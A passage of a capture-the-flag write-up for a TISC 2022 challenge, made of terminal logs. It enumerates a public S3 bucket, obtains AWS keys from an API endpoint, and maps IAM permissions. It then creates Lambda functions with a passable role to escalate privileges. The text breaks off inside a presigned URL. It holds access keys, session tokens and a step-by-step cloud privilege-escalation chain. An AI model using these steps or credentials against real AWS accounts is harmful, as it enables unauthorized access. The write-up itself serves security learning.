drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 3 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  838 Jan  1  1980 slide1.xml.rels

./ppt/theme:
total 16
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwxr-xr-x 8 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali 6807 Jan  1  1980 theme1.xml

./_rels:
total 12
drwxr-xr-x 2 kali kali 4096 Sep  8 08:47 .
drwx------ 5 kali kali 4096 Sep  8 08:47 ..
-rw-r--r-- 1 kali kali  738 Jan  1  1980 .rels

┌──(kali㉿kali)-[/tmp/flag]
└─$ md5sum ./ppt/media/media1.mp3 
f9fc54d767edc937fc24f7827bf91cfe  ./ppt/media/media1.mp3

Flag

TISC{f9fc54d767edc937fc24f7827bf91cfe}

Level 4B

Solution

Identifying S3 Bucket

Firstly, I viewed the source code of the website at https://d20whnyjsgpc34.cloudfront.net, which suggests AWS S3 buckets (since it uses the term S3).

<header>

  <div class="p-5 text-center bg-light">
    <!-- Passcode -->
    <h1 class="mb-3">Cats rule the world</h1>
    <!-- Passcode -->
    <!-- 
      ----- Completed -----
      * Configure CloudFront to use the bucket - palindromecloudynekos as the origin

      ----- TODO -----
      * Configure custom header referrer and enforce S3 bucket to only accept that particular header
      * Secure all object access
    -->
    <h4 class="mb-3">—ฅ/ᐠ. ̫ .ᐟ\ฅ —</h4>
  </div>

</header>

Researching on AWS S3 Buckets gets me to this link, https://atos.net/en/lp/securitydive/poorly-configured-s3-buckets-a-hackers-delight. Following a typical bucket header, I get the link https://palindromecloudynekos.s3.amazonaws.com/index.html

Enumerating S3 Bucket

I installed AWS CLI following this guide, and configured it using my peronal account.

I then accessed the bucket following this guide

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws s3 ls s3://    

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws s3 ls s3://palindromecloudynekos
                           PRE api/
                           PRE img/
2022-08-23 09:16:20         34 error.html
2022-08-23 09:16:20       2257 index.html

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws s3 ls s3://palindromecloudynekos/img/
2022-07-22 06:02:45     404845 photo1.jpg
2022-07-22 06:02:45     164700 photo2.jpg
2022-07-22 06:02:46     199175 photo3.jpg
2022-07-22 06:02:45     226781 photo4.jpg
2022-07-22 06:02:46     249156 photo5.jpg
2022-07-22 06:02:45     185166 photo6.jpg

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws s3 ls s3://palindromecloudynekos/api/
2022-08-23 09:16:20        432 notes.txt

┌──(kali㉿kali)-[/tmp/flag]
└─$

I accessed the file through the initial cloudfront URL. The bucket URL had permissions to prevent notes.txt from being accessed directly from there

┌──(kali㉿kali)-[~]
└─$ curl https://d20whnyjsgpc34.cloudfront.net/api/notes.txt                         
# Neko Access System Invocation Notes

Invoke with the passcode in the header "x-cat-header". The passcode is found on the cloudfront site, all lower caps and separated using underscore.

https://b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com/prod/agent

All EC2 computing instances should be tagged with the key: 'agent' and the value set to your username. Otherwise, the antivirus cleaner will wipe out the resources.

┌──(kali㉿kali)-[~]
└─$

I accessed the endpoint stated in the notes.txt, and tested the access key

┌──(kali㉿kali)-[/tmp/flag]
└─$ curl https://b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com/prod/agent                                       

{"Message": "Error encountered. Please raise a support ticket through your relational team lead to resolve the issue."}                                                                                                                                                                        
┌──(kali㉿kali)-[/tmp/flag]
└─$ curl https://b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com/prod/agent -H "x-cat-header: cats_rule_the_world"              

{"Message": "Welcome there agent! Use the credentials wisely! It should be live for the next 120 minutes! Our antivirus will wipe them out and the associated resources after the expected time usage.", "Access_Key": "AKIAQYDFBGMSUFX5522K", "Secret_Key": "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"}                                                                                                                                                                        
┌──(kali㉿kali)-[/tmp/flag]
└─$

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws configure                            
AWS Access Key ID [********************]: AKIAQYDFBGMSUFX5522K
AWS Secret Access Key [********************]: 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
Default region name [None]: us-east-1
Default output format [None]: 
┌──(kali㉿kali)-[/tmp/flag]
└─$

AWS

AWS IAM Enum

General

I did some general enumeration first

┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/andresriancho/enumerate-iam.git
Cloning into 'enumerate-iam'...
remote: Enumerating objects: 56, done.
remote: Total 56 (delta 0), reused 0 (delta 0), pack-reused 56
Receiving objects: 100% (56/56), 33.63 KiB | 3.74 MiB/s, done.
Resolving deltas: 100% (25/25), done.

┌──(kali㉿kali)-[/tmp]
└─$ cd enumerate-iam        

┌──(kali㉿kali)-[/tmp/enumerate-iam]
└─$ 

┌──(kali㉿kali)-[/tmp/enumerate-iam]
└─$ python3 ./enumerate-iam.py --access-key AKIAQYDFBGMSUFX5522K --secret-key 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 
2022-09-08 10:29:30,843 - 13773 - [INFO] Starting permission enumeration for access-key-id "AKIAQYDFBGMSUFX5522K"
2022-09-08 10:29:32,363 - 13773 - [INFO] -- Account ARN : arn:aws:iam::051751498533:user/user-b464a9d644194b0dafc3d166d36d5c4e
2022-09-08 10:29:32,364 - 13773 - [INFO] -- Account Id  : 051751498533
2022-09-08 10:29:32,364 - 13773 - [INFO] -- Account Path: user/user-b464a9d644194b0dafc3d166d36d5c4e
2022-09-08 10:29:32,615 - 13773 - [INFO] Attempting common-service describe / list brute force.
2022-09-08 10:29:35,551 - 13773 - [INFO] -- ec2.describe_regions() worked!
2022-09-08 10:29:36,374 - 13773 - [INFO] -- ec2.describe_vpcs() worked!
2022-09-08 10:29:36,790 - 13773 - [INFO] -- ec2.describe_subnets() worked!
2022-09-08 10:29:36,925 - 13773 - [INFO] -- ec2.describe_route_tables() worked!
/home/kali/.local/lib/python3.9/site-packages/botocore/client.py:621: FutureWarning: The rds client is currently using a deprecated endpoint: rds.amazonaws.com. In the next minor version this will be moved to rds.us-east-1.amazonaws.com. See https://github.com/boto/botocore/issues/2705 for more details.
  warnings.warn(
2022-09-08 10:29:37,139 - 13773 - [INFO] -- ec2.describe_security_groups() worked!
/home/kali/.local/lib/python3.9/site-packages/botocore/client.py:621: FutureWarning: The sqs client is currently using a deprecated endpoint: queue.amazonaws.com. In the next minor version this will be moved to sqs.us-east-1.amazonaws.com. See https://github.com/boto/botocore/issues/2705 for more details.
  warnings.warn(
/home/kali/.local/lib/python3.9/site-packages/botocore/client.py:621: FutureWarning: The shield client is currently using a deprecated endpoint: shield.us-east-1.amazonaws.com. In the next minor version this will be moved to shield.us-east-1.amazonaws.com. See https://github.com/boto/botocore/issues/2705 for more details.
  warnings.warn(
2022-09-08 10:29:45,719 - 13773 - [INFO] -- dynamodb.describe_endpoints() worked!
/home/kali/.local/lib/python3.9/site-packages/botocore/client.py:621: FutureWarning: The health client is currently using a deprecated endpoint: health.us-east-1.amazonaws.com. In the next minor version this will be moved to global.health.amazonaws.com. See https://github.com/boto/botocore/issues/2705 for more details.
  warnings.warn(
2022-09-08 10:29:49,024 - 13773 - [INFO] -- sts.get_session_token() worked!
2022-09-08 10:29:49,284 - 13773 - [INFO] -- sts.get_caller_identity() worked!
2022-09-08 10:29:51,080 - 13773 - [INFO] -- iam.list_roles() worked!
2022-09-08 10:29:52,409 - 13773 - [INFO] -- iam.list_instance_profiles() worked!
2022-09-08 10:29:55,985 - 13773 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action

I researched on AWS CLI and found some useful resources

STS

I want to find out the user first

┌──(kali㉿kali)-[/tmp]
└─$ aws sts get-session-token
{
    "Credentials": {
        "AccessKeyId": "ASIAQYDFBGMSZBF6TPOA",
        "SecretAccessKey": "Sb9XcmVH6D9AHBkyZqrEcmVDHj1Oc8bc+uTx3Sfc",
        "SessionToken": "IQoJb3JpZ2luX2VjEKL//////////wEaCXVzLWVhc3QtMSJHMEUCICzSTyubo2spTfu218pmipD3AYOuvnC5LlyAbhn0puoRAiEA8cdOAMs8VwGz2AuVcyvjq1l6dpB9QXrVl3KfF3cv1AIq6wEIOxABGgwwNTE3NTE0OTg1MzMiDLaA+gudPdOkAEldWCrIAa0Dqo6VDEv9Pdz6fft34HbHzK1bpbyCjN4I5BPoQDGDB9NL9ndxhITaq6fOB6dIXGDKYPhUbrTFvVfIDENksgK5MET6qgb3wNw9wEmGFzmdSBXDj5YLBUVZwx7VmdM/3y42Jcii9CuAY/Zl7aT6DSO3GOTpkbNEAYwsgQEtNR3mqiGS1+qlfa29dK+zieN40jvT4zoLi8mkYpCXfb17mY4P2NT/0GK4Dd2uin7zOcf/LCvoG3eN7jOfcETxf5OzfvC3WTsRx7FBMMyw6pgGOpgBPxv6X3QG+ux6pWx+xnmZvz06ju8lq4h9EOmDWd3gi3bUwSI8DkbAmEUGZ0VPXcBzZ2s+mgntkHwYFhLZAJd5s04sJnnEZDbaGWTM3SzS+1yuODmEHg9c31yHUmpEE/rI7TpaQRg1v4oaLvdhM03OCmDQY4uuT96Gi4xRLy7vLpklg3fXAWPt746hvsZ8HP61KlBLyEZJams=",
        "Expiration": "2022-09-09T13:35:08+00:00"
    }
}

The username can be found in the Arn. Its after the slash, in this case its user-a4f54ea053294863a598e6d01c5e4cc3

┌──(kali㉿kali)-[/tmp]
└─$ aws sts get-caller-identity
{
    "UserId": "AIDAQYDFBGMS6M3T3E7N7",
    "Account": "051751498533",
    "Arn": "arn:aws:iam::051751498533:user/user-a4f54ea053294863a598e6d01c5e4cc3"
}

┌──(kali㉿kali)-[/tmp]
└─$

IAM

I wanted to look at the list of roles first, to figure what I can do.

┌──(kali㉿kali)-[/tmp/flag]
└─$ aws iam list-roles    
    ...

        {
            "Path": "/",
            "RoleName": "ec2_agent_role",
            "RoleId": "AROAQYDFBGMSYSEMEVAEH",
            "Arn": "arn:aws:iam::051751498533:role/ec2_agent_role",
            "CreateDate": "2022-07-22T09:29:34+00:00",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "lambda_agent_development_role",
            "RoleId": "AROAQYDFBGMS2NDQR5JSE",
            "Arn": "arn:aws:iam::051751498533:role/lambda_agent_development_role",
            "CreateDate": "2022-07-22T09:29:34+00:00",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "lambda_agent_webservice_role",
            "RoleId": "AROAQYDFBGMSTH7VQVGQC",
            "Arn": "arn:aws:iam::051751498533:role/lambda_agent_webservice_role",
            "CreateDate": "2022-07-22T09:29:35+00:00",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "lambda.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
    ...

User Policy

I tried to find user policy to figure out what I can and cannot do

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws iam list-attached-user-policies --user-name user-a5df75ad1753434aa2db7dbe7d361b96                                                                         254 ⨯
{
    "AttachedPolicies": [
        {
            "PolicyName": "user-a5df75ad1753434aa2db7dbe7d361b96",
            "PolicyArn": "arn:aws:iam::051751498533:policy/user-a5df75ad1753434aa2db7dbe7d361b96"
        }
    ]
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws iam get-policy --policy-arn "arn:aws:iam::051751498533:policy/user-a5df75ad1753434aa2db7dbe7d361b96"
{
    "Policy": {
        "PolicyName": "user-a5df75ad1753434aa2db7dbe7d361b96",
        "PolicyId": "ANPAQYDFBGMSUGVZ37LUE",
        "Arn": "arn:aws:iam::051751498533:policy/user-a5df75ad1753434aa2db7dbe7d361b96",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2022-09-09T07:35:46+00:00",
        "UpdateDate": "2022-09-09T07:35:46+00:00",
        "Tags": []
    }
}
┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws iam get-policy-version --policy-arn "arn:aws:iam::051751498533:policy/user-a5df75ad1753434aa2db7dbe7d361b96" --version-id "v1"                            252 ⨯
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion",
                        "iam:ListAttachedRolePolicies",
                        "iam:ListRoles"
                    ],
                    "Resource": "*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": [
                        "lambda:CreateFunction",
                        "lambda:InvokeFunction",
                        "lambda:GetFunction"
                    ],
                    "Resource": "arn:aws:lambda:ap-southeast-1:051751498533:function:${aws:username}-*"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": [
                        "iam:ListAttachedUserPolicies"
                        "iam:ListAttachedUserPolicies"
                    ],
                    "Resource": "arn:aws:iam::051751498533:user/${aws:username}"
                },
                {
                    "Sid": "VisualEditor3",
                    "Effect": "Allow",
                    "Action": [
                        "iam:PassRole"
                    ],
                    "Resource": "arn:aws:iam::051751498533:role/lambda_agent_development_role"
                },
                {
                    "Sid": "VisualEditor4",
                    "Effect": "Allow",
                    "Action": [
                        "ec2:DescribeVpcs",
                        "ec2:DescribeRegions",
                        "ec2:DescribeSubnets",
                        "ec2:DescribeRouteTables",
                        "ec2:DescribeSecurityGroups",
                        "ec2:DescribeInstanceTypes",
                        "iam:ListInstanceProfiles"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2022-09-09T07:35:46+00:00"
    }
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$

You can pass the arn:aws:iam::051751498533:role/lambda_agent_development_role role, as it has iam:PassRole.

You can also create lambda functions with the name arn:aws:lambda:ap-southeast-1:051751498533:function:${aws:username}-*, and then pass the above role to it.

AWS Lambda

Function Testing

Firstly, I tried running a lambda function with the help of this guide

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ nano index.js

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ cat index.js           

exports.handler = async function(event, context, callback) {
  return 'hello world';
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ zip function.zip index.js
  adding: index.js (deflated 7%)

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws lambda create-function --function-name user-a5df75ad1753434aa2db7dbe7d361b96-helloworld --zip-file fileb://function.zip --runtime nodejs16.x --handler index.handler --role arn:aws:iam::051751498533:role/lambda_agent_development_role
{
    "FunctionName": "user-a5df75ad1753434aa2db7dbe7d361b96-helloworld",
    "FunctionArn": "arn:aws:lambda:ap-southeast-1:051751498533:function:user-a5df75ad1753434aa2db7dbe7d361b96-helloworld",
    "Runtime": "nodejs16.x",
    "Role": "arn:aws:iam::051751498533:role/lambda_agent_development_role",
    "Handler": "index.handler",
    "CodeSize": 248,
    "Description": "",
    "Timeout": 3,
    "MemorySize": 128,
    "LastModified": "2022-09-09T08:04:50.310+0000",
    "CodeSha256": "GC2ej8g5kiPRFpnf9EQvIcl4DkDriObC0LPg6kJxTLM=",
    "Version": "$LATEST",
    "TracingConfig": {
        "Mode": "PassThrough"
    },
    "RevisionId": "918de20b-0d4d-4ef6-8674-704980ae7c8b",
    "State": "Pending",
    "StateReason": "The function is being created.",
    "StateReasonCode": "Creating",
    "PackageType": "Zip",
    "Architectures": [
        "x86_64"
    ],
    "EphemeralStorage": {
        "Size": 512
    }
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws lambda get-function --function-name user-a5df75ad1753434aa2db7dbe7d361b96-helloworld 
{
    "Configuration": {
        "FunctionName": "user-a5df75ad1753434aa2db7dbe7d361b96-helloworld",
        "FunctionArn": "arn:aws:lambda:ap-southeast-1:051751498533:function:user-a5df75ad1753434aa2db7dbe7d361b96-helloworld",
        "Runtime": "nodejs16.x",
        "Role": "arn:aws:iam::051751498533:role/lambda_agent_development_role",
        "Handler": "index.handler",
        "CodeSize": 248,
        "Description": "",
        "Timeout": 3,
        "MemorySize": 128,
        "LastModified": "2022-09-09T08:04:50.310+0000",
        "CodeSha256": "GC2ej8g5kiPRFpnf9EQvIcl4DkDriObC0LPg6kJxTLM=",
        "Version": "$LATEST",
        "TracingConfig": {
            "Mode": "PassThrough"
        },
        "RevisionId": "97b94a13-cc62-4ce9-bef1-307ced395057",
        "State": "Active",
        "LastUpdateStatus": "Successful",
        "PackageType": "Zip",
        "Architectures": [
            "x86_64"
        ],
        "EphemeralStorage": {
            "Size": 512
        }
    },
    "Code": {
        "RepositoryType": "S3",
        "Location": "https://awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com/snapshots/051751498533/user-a5df75ad1753434aa2db7dbe7d361b96-helloworld-adf2d0ad-5438-45a2-bde3-3a9342de84e2?versionId=j8OIPEw3mHT2701GwQ5R7di10kb.KGZh&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEKf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDmFwLXNvdXRoZWFzdC0xIkgwRgIhAML%2Fuslw0lHqTwVUclp0IjRq4j97DKbSw8fqdcAWhZdVAiEApRqDANMihAVPnaTPCFfYkQLVzWqUcbTGX3fYbSm7G3Aq2wQIQBAEGgwyOTUzMzg3MDM1ODMiDCIdr4DbWo5ooe%2F48Sq4BNKHgqSncjFRgBPZoyZG3qvqJiFBDYCGkQxYwzfoWJw6fKJ38fbeRI9hEAXz45nPG5YdPYwPlbTxV0KGA9wJxONeA7e3%2BDrhdZalJlMYdWc3f0okBYN%2FzfGR7Dr%2F40gtl4TqsjEMsYn5K83554LhIaAvpF3RsEM5PGmlF6FNDKxpArX41kGqzBFyO%2Fc6XnT4HmwFZd178cCDe3b9TtzwiJ9uKptgvPJ0rLAJwFWn%2BSYDj7N%2Bk6nLPw07Ca7%2BjljKyzJQY39VYRYRtbOemDQnoe9q9tAfhcAeWUsLMQpmQrYtMU%2FA8qtsXNpwfXyJYRQOQ8hbo258b7PBrhMKmr12KQp4UbKXD%2B9Ch8ONBTfkaBc4%2BQzE6Q6lqqhUwWg3TklBFDpkr4phU%2FY69PBn60ZCUmDjJiAqGjiretanxVzcEeP56YaT3wtaEYHY2DqfmR35I4SAfaQHqpu0oDR2FtyvsJiJNVh2f2PGLdJELlKAyP%2BWRRFpiDtTxQyA%2FPf6J03p71ZhkOQdZnOhSCiUx8qhiuhwIbK5zIqwgcMHhnF0WFr7tQLHRbgLqG2If2XQQgMQ5jOYY%2BmeVUNR3rhKeWtTRJk%2Bf0iJruf4S%2Fd5biQrFQ7HQzWEkSAbeJHZhHqrLo7K2gYnZ%2Fb%2FjweGkb%2F0mIzR8co72At6cJLZskOHorltPWhEyEa5J7NfkcZokuRPDcX14xAdGH04yfjBNJ1w60rIvzo8Wf5nzVBNSNZC3dAzWYkJGQOvFT9pQ%2FwwvMzrmAY6qAHq%2FszymAahlDysJ89xW19gKNJem84Bp7lEVUjPngmTEWDw7Y%2Ft5iVkEikEtfHnAn1WSHfoVgpl3GbAyh%2FawyzVfKirLfXuLw%2FWAsSsIiKd2O5YEgc3tX21miUktThFjIFEiomiUMbwMtmMSngJPBBKvFCmuScSC6vqplwYE1ykWQvGxKetwmsj%2BnztQKIas2aHBhZyHTdWbajX7y2EWMWiHMB6czPE1xI%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20220909T080615Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAUJQ4O7LPUL5JLYKT%2F20220909%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Signature=cc5fdd01b0c9b58854a454b446f84fe461a96d1ef1f683702296888a3f0d82c6"
    }
}
┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ aws lambda invoke --function-name user-a5df75ad1753434aa2db7dbe7d361b96-helloworld out.txt                                                                    252 ⨯
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$ cat out.txt 
"hello world"    

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS]
└─$

Lambda Role Policy

I tried enumerating more on what this lambda role could do to see how could I further privesc from the lambda function. It turns out that there are EC2 privileges here

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS/lambda]
└─$ aws iam list-attached-role-policies --role-name "lambda_agent_development_role"                                                                               254 ⨯
{
    "AttachedPolicies": [
        {
            "PolicyName": "iam_policy_for_lambda_agent_development_role",
            "PolicyArn": "arn:aws:iam::051751498533:policy/iam_policy_for_lambda_agent_development_role"
        }
    ]y
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS/lambda]
└─$ aws iam get-policy --policy-arn "arn:aws:iam::051751498533:policy/iam_policy_for_lambda_agent_development_role"
{
    "Policy": {
        "PolicyName": "iam_policy_for_lambda_agent_development_role",
        "PolicyId": "ANPAQYDFBGMS2XASGX3JS",
        "Arn": "arn:aws:iam::051751498533:policy/iam_policy_for_lambda_agent_development_role",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "AWS IAM Policy for Lambda agent development service",
        "CreateDate": "2022-07-22T09:29:36+00:00",
        "UpdateDate": "2022-08-23T13:16:26+00:00",
        "Tags": []
    }
}

┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS/lambda]
└─$ aws iam get-policy-version --policy-arn "arn:aws:iam::051751498533:policy/iam_policy_for_lambda_agent_development_role" --version-id "v2"
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "ec2:RunInstances",
                        "ec2:CreateVolume",
                        "ec2:CreateTags"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                },
                {
                    "Action": [
                        "lambda:GetFunction"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:lambda:ap-southeast-1:051751498533:function:cat-service"
                },
                {
                    "Action": [
                        "iam:PassRole"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::051751498533:role/ec2_agent_role",
                    "Sid": "VisualEditor2"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v2",
        "IsDefaultVersion": true,
        "CreateDate": "2022-08-23T13:16:26+00:00"
    }
}


┌──(weirdAAL)(kali㉿kali)-[/tmp/AWS/lambda]
└─$

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$ aws lambda invoke --function-name arn:aws:lambda:ap-southeast-1:051751498533:function:cat-service /tmp/out.txt

An error occurred (AccessDeniedException) when calling the Invoke operation: User: arn:aws:iam::051751498533:user/user-00e6fd16c555452c900d1b14d6af61c5 is not authorized to perform: lambda:InvokeFunction on resource: arn:aws:lambda:ap-southeast-1:051751498533:function:cat-service because no identity-based policy allows the lambda:InvokeFunction action

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$

Lambda Privesc, view other Lambda

I tried viewing the other lambda function first, since it's a privilege with the lambda_agent role. I referred to here to help with the code.

lambda_function.py

# https://www.learnaws.org/2020/12/16/aws-ec2-boto3-ultimate-guide/
# https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/lambda_privesc/cheat_sheet_chris.md
import boto3

REGION_NAME="ap-southeast-1"

# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/lambda.html#Lambda.Client.get_function
def get_function():
    lambda_client = boto3.client('lambda')
    response = lambda_client.get_function(
        FunctionName='arn:aws:lambda:ap-southeast-1:051751498533:function:cat-service'
    )
    return response

def lambda_handler(event, context):
    func_response = get_function()
    return func_response

#role_arn="arn:aws:iam::051751498533:role/ec2_agent_role"

run.sh

LAMBDA_FUNC=user-00e6fd16c555452c900d1b14d6af61c5-ec2test4

pip install --target ./package boto3
cd package
zip -r ../function.zip . > /dev/null
cd ..
zip -g function.zip lambda_function.py
rm -rf package

aws lambda create-function --zip-file fileb://function.zip --runtime python3.7 --handler lambda_function.lambda_handler --role arn:aws:iam::051751498533:role/lambda_agent_development_role --function-name $LAMBDA_FUNC
aws lambda invoke --function-name $LAMBDA_FUNC /tmp/out.txt
cat /tmp/out.txt

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$ ls
lambda_function.py  run.sh

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$ ./run.sh
...
updating: lambda_function.py (deflated 43%)
{
    "FunctionName": "user-00e6fd16c555452c900d1b14d6af61c5-ec2test4",
    "FunctionArn": "arn:aws:lambda:ap-southeast-1:051751498533:function:user-00e6fd16c555452c900d1b14d6af61c5-ec2test4",
    "Runtime": "python3.7",
    "Role": "arn:aws:iam::051751498533:role/lambda_agent_development_role",
    "Handler": "lambda_function.lambda_handler",
    "CodeSize": 9332181,
    "Description": "",
    "Timeout": 3,
    "MemorySize": 128,
    "LastModified": "2022-09-09T10:00:13.477+0000",
    "CodeSha256": "WZtZZh86oUgfKI5/0zRc+JVC1++pkWsl22clPyWDaUo=",
    "Version": "$LATEST",
    "TracingConfig": {
        "Mode": "PassThrough"
    },
    "RevisionId": "bb298cd0-0211-460a-a5ad-15c90b2173c1",
    "State": "Pending",
    "StateReason": "The function is being created.",
    "StateReasonCode": "Creating",
    "PackageType": "Zip",
    "Architectures": [
        "x86_64"
    ],
    "EphemeralStorage": {
        "Size": 512
    }
}
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}
{"ResponseMetadata": {"RequestId": "df15839d-bf36-4cf1-a6d0-6a6f8fea517e", "HTTPStatusCode": 200, "HTTPHeaders": {"date": "Fri, 09 Sep 2022 10:00:17 GMT", "content-type": "application/json", "content-length": "2848", "connection": "keep-alive", "x-amzn-requestid": "df15839d-bf36-4cf1-a6d0-6a6f8fea517e"}, "RetryAttempts": 0}, "Configuration": {"FunctionName": "cat-service", "FunctionArn": "arn:aws:lambda:ap-southeast-1:051751498533:function:cat-service", "Runtime": "python3.9", "Role": "arn:aws:iam::051751498533:role/lambda_agent_development_role", "Handler": "main.lambda_handler", "CodeSize": 416, "Description": "", "Timeout": 3, "MemorySize": 128, "LastModified": "2022-08-23T13:16:19.469+0000", "CodeSha256": "52UWd1KHAZub5aJIS953mHrKVM0mFPiVBuGahWFGaz4=", "Version": "$LATEST", "TracingConfig": {"Mode": "PassThrough"}, "RevisionId": "90be1b48-3339-4a78-a083-b77e285b7b8a", "State": "Active", "LastUpdateStatus": "Successful", "PackageType": "Zip"}, "Code": {"RepositoryType": "S3", "Location": "https://awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com/snapshots/051751498533/cat-service-f02e065f-3e98-4c04-8d77-c627d6d8d5a2?versionId=XMHQ4OlZGN52Y_FiI23NgMfVyC2eL_sD&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEKn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgVPWDaYHJlMRuv68%2F2KU7CnITmi1VfjUFYA%2FNOKdyXJwCIGttcU4mQ3yG6heLPsf68OxVG%2Be%2B3XgadfsmNxjqHhtnKtsECEIQBBoMMjk1MzM4NzAzNTgzIgybdHXD%2BdW7I4bBzosquATyJkvl9EBzjY3gRW8PYnOx9Hx%2FhkP%2FtcoKs8V960UbbTm%2FvdM9uHGqRPQOymRA5rV8Mn4ab7kOLwmkoj8idhSYVqxmrmVQMw%2F38rknTmhjctVxiBTtySxajN1Lk3OcN%2FTNTPp084PwrztLu6J69MpcbtU5We0yUCR%2BimmbMQ3UZE1KrqMCMZf%2Ffw9PIuaUpb25wB58U%2BusFKNDESVGnasMuLCaSkoV4PQhvJbqTnt4Mj1QMLG25J5gyks5CejdxvWN5GEEFIZkAUkhXLO24IqBeNg3D28x7ndGmYDdtH93rdqichuColz0tZCjJHdVd2T2R3ympa54LVeqWi1p1pwF%2BIt%2BEd%2BOV3bsDFIR%2FOKcd8HQd9TvOtsh6mAijX0vzOMoIP0gZbzvOHHfrE1Cl4pLtw3kBWki5Zj72nea2%2FwLGYslN2Y1Wu1IDk1%2FuONb4%2FJxoxG2AbHJw7a0nTAWByfRp43K7641WZogJK9kiOG%2FIFaXkbR0gTFLngLGHz8GLjBoFyHDaklBChdB60OpejmYgZnCTPRIyBsSR7i3%2BPsydGzMI8QzsLD2W2qSWt2C6N0kWwqeyyzvu6EYio1l2YEmHtQa14y0U6Dz7wNFN0VLnKVvAgK22cktfZbm11bPG%2FAyjUKRcBqUVaZyBl6b9JgKGdKwevmJzYI%2FsAN5oxtDwvO%2FiRLFVeVV2XflxqVLw9wqPr%2BnF3yw%2FTzUdtbTadkGsDDfeGe8iX3TNnbcCpiTAB4VFKyk8sDHMOeI7JgGOqoB943K6qC1kUngqxMXWO%2BXUDiyHh15Q3jaJiWbtJpRrT08fxIT%2BWxZauF5fuL1NEEIOu%2FBMnbbvV5JfOys0RLJ87PcsZ%2B9K7gDECtZyLobJvtCbjyulcVgQQSdiiojrqDhWGFxrHKUmbddgLTfWpP0PR%2BWPVBrFzZ9m66avkdzCgoomtKHtVZCbEGl1nv9Sab6Ny